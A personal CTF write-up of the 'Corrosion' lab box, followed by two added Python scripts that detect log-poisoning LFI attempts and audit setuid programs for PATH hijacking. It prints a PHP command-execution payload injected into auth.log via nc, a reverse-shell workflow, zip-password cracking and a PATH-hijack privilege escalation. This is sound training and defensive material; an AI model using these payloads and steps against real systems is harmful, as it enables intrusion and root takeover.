I Suck at CTFs: Corrosion

takeaway tl;dr:

  • nmap

    • enumerate the box per usual

  • ffuf

    • directory fuzzing to find hidden directories and hidden php files

    • parameter fuzzing of the php files to find LFI

  • zip2john

    • extracting the password hash for a zip

  • fcrackzip

    • another way of cracking zip files without having to extract the hash first

  • <?php passthru($_GET['cmd']);?>

    • PHP script to inject into a log that is returned via php

    • this is for Log Poisoning

  • echo '<?php passthru($_GET["cmd"]);?>' | nc $IP 22

    • another form of getting the command into the log file

  • bash reverse shell from pentestmonkey (https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)

  • sudo -l

    • find files the current user can run as root

  • echo "chmod +s /bin/cat" > cat

    • create a local ./cat file that will run the chmod command

    • this is the unquoted path binary vulnerability used for privesc

  • SUID bits

    • Using SUID bit set binaries to run as root to get flags

  • TTPs:

    • T1595.002 – Active Scanning: Network Scanning

    • T1595.001 – Active Scanning: Web Application Scanning

    • T1110.002 – Brute Force: Password Cracking

    • T1059.008 – Command and Scripting Interpreter: PHP

    • T1203 – Exploitation for Client Execution

    • T1190 – Exploit Public-Facing Application

    • T1548.003 – Abuse Elevation Control Mechanism: Sudo and Sudo Caching

    • T1068 – Exploitation for Privilege Escalation

  • nmap (not shown) showed port 80 exposed

  • checked for robots.txt and it wasn't found

  • ffuf with directory-list-medium found the /task/, /blog-post/ and /archive/ directories (not shown)

  • checking the file shows that the box's auth log has loosened permissions

  • ffuf also showed a blog-post directory

  • the source code also didn't show anything useful

  • tried exiftool and didn’t find anything in the picture

  • looking at /archives/ shows a randylogs.php file with a non-zero size

  • opening and downloading randylogs.php shows nothing

  • after a long time of looking around I was stuck af, so I took a look at the walkthrough for a hint and it said to do parameter fuzzing

  • looking up parameter fuzzing, it's very common for php files

  • php files are typically loaded dynamically with variables, so a request parameter is common

  • ffuf -w $WORDLIST -u "$IP/archives/randylogs.php?FUZZ=/etc/passwd" -mc 200-403 -fs 0 -c -v -o $OUTPUTFILE

    • this does parameter fuzzing

    • -fs 0: filters out zero-size responses, leaving only non-empty results

  • this finds that the request parameter "file" returns results for us

  • this is a common LFI vulnerability

  • given the hint in todo_list.txt we check the /var/log/auth.log of the box

  • so let's try SSH-ing into the box, and we can see that our unsuccessful connection is logged (not shown)

  • this is a log poisoning vulnerability because it’s reflected back to us

  • I had to get a hint as to how we can use this for log poisoning

  • because this php file evaluates what it includes, we can send it a php script, so that if we add another parameter to the request we can get RCE

  • I tried multiple ways to get the script into the auth.log

  • ngl a lot of the walkthroughs said to just SSH into the box with this command as the username but it was not accepted

  • maybe it was my version of ssh not allowing me to do this

  • so eventually I tried sending the string directly through nc

  • echo '<?php passthru($_GET["cmd"]);?>' | nc $IP 22

  • after the php script is logged in auth.log (not shown) we can provide the additional parameter and command to run (cmd=id)

  • so now when we look at our log the portion that had cmd in it is evaluated as a system command giving us RCE
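
From the defender's side, the two signals in this part of the box are easy to pick out of logs: an include parameter being pointed at system files or at a log, and PHP tags turning up inside auth.log, where sshd would never write them. The scanner below is an added example written for this post, not code from the writeup or from the box; the access-log lines, auth.log lines, host name and addresses are constructed samples, and the rule names are my own.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample data (not taken from the writeup): a few web-server access-log lines
# and a few sshd lines from auth.log. Host name, addresses and timestamps are made up.
ACCESS_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /archives/randylogs.php?file=/etc/passwd HTTP/1.1" 200 1832
10.0.0.9 - - [10/Oct/2023:13:55:50 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2023:13:56:10 +0000] "GET /archives/randylogs.php?file=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 0
10.0.0.5 - - [10/Oct/2023:13:57:02 +0000] "GET /archives/randylogs.php?file=/var/log/auth.log&cmd=id HTTP/1.1" 200 9100
"""

AUTH_LOG = """\
Oct 10 13:55:20 corrosion sshd[1234]: Failed password for randy from 10.0.0.9 port 50010 ssh2
Oct 10 13:56:40 corrosion sshd[1301]: Invalid user <?php passthru($_GET["cmd"]);?> from 10.0.0.5 port 51234
"""

# Common log format: client, identd, user, [timestamp], "request line", status, size.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
# Files that get probed first when someone tests an include parameter.
SENSITIVE_PREFIXES = ("/etc/passwd", "/etc/shadow", "/var/log/", "/proc/self/", "/home/")
PHP_TAG_RE = re.compile(r"<\?php|<\?=", re.IGNORECASE)


def lfi_indicators(value):
    """Reasons a single query-string value looks like a file-inclusion probe."""
    v = unquote(value)  # parse_qs decoded once already; decode again to catch double encoding
    reasons = []
    if "../" in v or "..\\" in v:
        reasons.append("traversal")
    if v.startswith(SENSITIVE_PREFIXES):
        reasons.append("sensitive-path")
    if v.startswith(("php://", "data:")):
        reasons.append("stream-wrapper")
    return reasons


def scan_access_log(text):
    """Flag requests whose parameters look like LFI probes; escalate when a log file is
    being included together with extra parameters, the shape of a poisoned-log trigger."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        params = parse_qs(parts.query, keep_blank_values=True)
        hits = {}
        for name, values in params.items():
            reasons = sorted({r for v in values for r in lfi_indicators(v)})
            if reasons:
                hits[name] = reasons
        if not hits:
            continue
        rule = "lfi-probe"
        includes_log = any("log" in unquote(v) for n in hits for v in params[n])
        if includes_log and len(params) > len(hits):
            rule = "log-include-with-extra-params"
        findings.append({"ip": m["ip"], "path": parts.path, "rule": rule, "params": hits})
    return findings


def scan_auth_log(text):
    """Flag lines that carry PHP tags: genuine sshd output never contains them."""
    return [{"rule": "php-tag-in-auth-log", "line": line}
            for line in text.splitlines() if PHP_TAG_RE.search(line)]


if __name__ == "__main__":
    for finding in scan_access_log(ACCESS_LOG) + scan_auth_log(AUTH_LOG):
        print(finding)
```

Run against the sample data it reports three access-log hits (two plain probes and one log include carrying an extra parameter) and one poisoned auth.log line. The second decode in lfi_indicators matters in practice: a single-decode check misses traversal sent as %252F.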

  • for the longest time I couldn’t figure out why my kali box wasn’t connecting to the vuln box

  • no idea and no motivation to find out why /shrug

  • so on my mac host I just started a nc listener

    • nc -l 1234

  • provided the cmd parameter with a bash reverse shell from pentestmonkey (https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)

  • I got a reverse shell in my listener

  • I upgraded my shell with that python command (not shown) and used that to run commands to find files

  • I went through various file extensions so I could evaluate the results more easily than searching the entire filesystem for everything

    • I looked for .bak and then found this user_backup.zip when looking for .zip files

  • ran a python http server on the vuln box to share the user_backup.zip

    • in the reverse shell:

      • cd /var/backups/

      • python3 -m http.server 8888

    • back on my kali box, I browsed to $IP:8888 in a web browser and was able to download the file

  • extracted my rockyou file to the local directory

    • 7z x $FILE

  • zip2john $FILE > $OUTPUT

  • ran john against this with rockyou.txt but was not able to find the password :(

  • used another tool and it was much faster

  • fcrackzip -u -D -p $WORDLIST $FILE

  • unzip $ZIPFILE

  • and received SSH keys, a text file and a C source file

  • Looking at easysysinfo.c we can see a few system commands that will be run when the binary is executed

  • I didn't notice at first, but the cat command is different from the other commands (important for later)

  • the text file gives us randy’s password

  • SSH-ing into the box with the RSA key still required a password, so using the one we just found I was able to get in

  • there we can see the first flag user.txt and can cat it

  • here we need to start enumerating again so looking around we see that randy has a /tool/ directory in his home folder

  • checking easysysinfo.py we see that the system commands are different from those in the .c file we were provided

  • that led me to check the rest of the files in that folder, and we see that easysysinfo is a binary with the SUID bit set

  • we can also find this with find . -perm -4000 2>/dev/null (not shown)

  • remembering that the commands in the .c file look different from the .py commands, I realize that there's an unquoted path vulnerability for privesc

  • so we need to control the cat command called by the .c code

  • echo "chmod +s /bin/bash" > cat

    • this will create a cat binary in our current directory that runs "chmod +s /bin/bash", allowing us to run /bin/bash with the SUID bit as well

  • the way that binaries are run on linux is based on the $PATH variable

  • it's a first come first served rule, so if we can tell the system to check the local path for a cat binary first, it will stop looking for the built-in cat file

  • export PATH=/home/randy/tools/:$PATH

    • this will tell our current session to look for binaries in our /tools/ directory first before looking elsewhere

  • for proof of concept I ls the /bin/bash binary to show that the SUID bit is not set

  • then run the ./easysysinfo binary (remember this is run as root because it has the SUID bit set)

  • the binary will call the cat command to set the SUID bit for /bin/bash

    • chmod +s /bin/bash

  • running the ls command again on /bin/bash shows that the SUID bit is now set

  • I wasn’t able to get the /bin/bash to run commands for me to get a shell :(

  • So i thought what if I just get the cat command to print the root.txt for me instead to finish the box?

  • changing the /tools/cat script to "chmod +s /usr/bin/cat" will set the SUID bit for the cat binary instead

  • doing so I was able to use /usr/bin/cat to print the root.txt
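
The root cause on this box is a privileged program spelling one command without its path and trusting whatever PATH the caller hands it. The following is an added example, not code from the writeup and not the box's easysysinfo.c: a small audit that flags relative command words in system()/popen()/exec*p() calls in C source, replays the first-match PATH rule the post describes so you can see which cat wins, and lists PATH entries a setuid program should refuse to honour. The sample C source, directory names and the SAFE_PATH value are my own constructions.

```python
import os
import re

# Calls that hand a command line to the shell or to a PATH search.
SHELL_CALL_RE = re.compile(r'\b(system|popen|execlp|execvp|execvpe)\s*\(\s*"([^"]*)"')

# Constructed sample, not the box's easysysinfo.c: one command is spelled without its path.
SAMPLE_C = """\
#include <stdlib.h>
int main(void) {
    /* imagine this binary is installed setuid root */
    system("/usr/bin/date");
    system("/usr/bin/uname -a");
    system("cat /etc/os-release");
    return 0;
}
"""


def relative_commands(c_source):
    """(line, call, command word) for every call whose command word is not an absolute path."""
    findings = []
    for lineno, line in enumerate(c_source.splitlines(), 1):
        for m in SHELL_CALL_RE.finditer(line):
            words = m.group(2).split()
            if words and not words[0].startswith("/"):
                findings.append((lineno, m.group(1), words[0]))
    return findings


def resolve_command(command, path_value, exists=os.path.isfile):
    """First-match PATH lookup, the rule the shell and execvp apply: the first directory
    holding a file of that name wins and later directories are never consulted.
    `exists` is injectable so the lookup can be exercised without a real filesystem."""
    for directory in path_value.split(":"):
        if directory == "":
            directory = "."  # an empty PATH entry means the current directory
        candidate = os.path.join(directory, command)
        if exists(candidate):
            return candidate
    return None


def untrusted_path_entries(path_value, user_writable):
    """PATH entries a privileged program must not honour: relative, empty, or writable by
    the invoking user. `user_writable` is a predicate on directory names."""
    return [d for d in path_value.split(":")
            if d == "" or not d.startswith("/") or user_writable(d)]


# A fixed search path is what a setuid program should install for itself (or use absolute
# command paths) before any system()/popen() call, instead of inheriting the caller's PATH.
SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


if __name__ == "__main__":
    print("relative commands:", relative_commands(SAMPLE_C))
    present = {"/home/randy/tools/cat", "/usr/bin/cat", "/bin/cat"}  # constructed file set
    hijacked = "/home/randy/tools/:/usr/bin:/bin"
    print("cat under inherited PATH:", resolve_command("cat", hijacked, present.__contains__))
    print("cat under SAFE_PATH:     ", resolve_command("cat", SAFE_PATH, present.__contains__))
    print("untrusted entries:", untrusted_path_entries(hijacked, lambda d: d.startswith("/home/")))
```

The audit reports line 6 of the sample (the bare cat) and nothing for the two absolute commands; the resolver shows the user-owned directory winning under the inherited PATH and /usr/bin winning under the fixed one. Either fix, absolute paths or a program-set PATH, closes the hole the post exploits; sudo's secure_path option does the same job for commands run through sudo.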
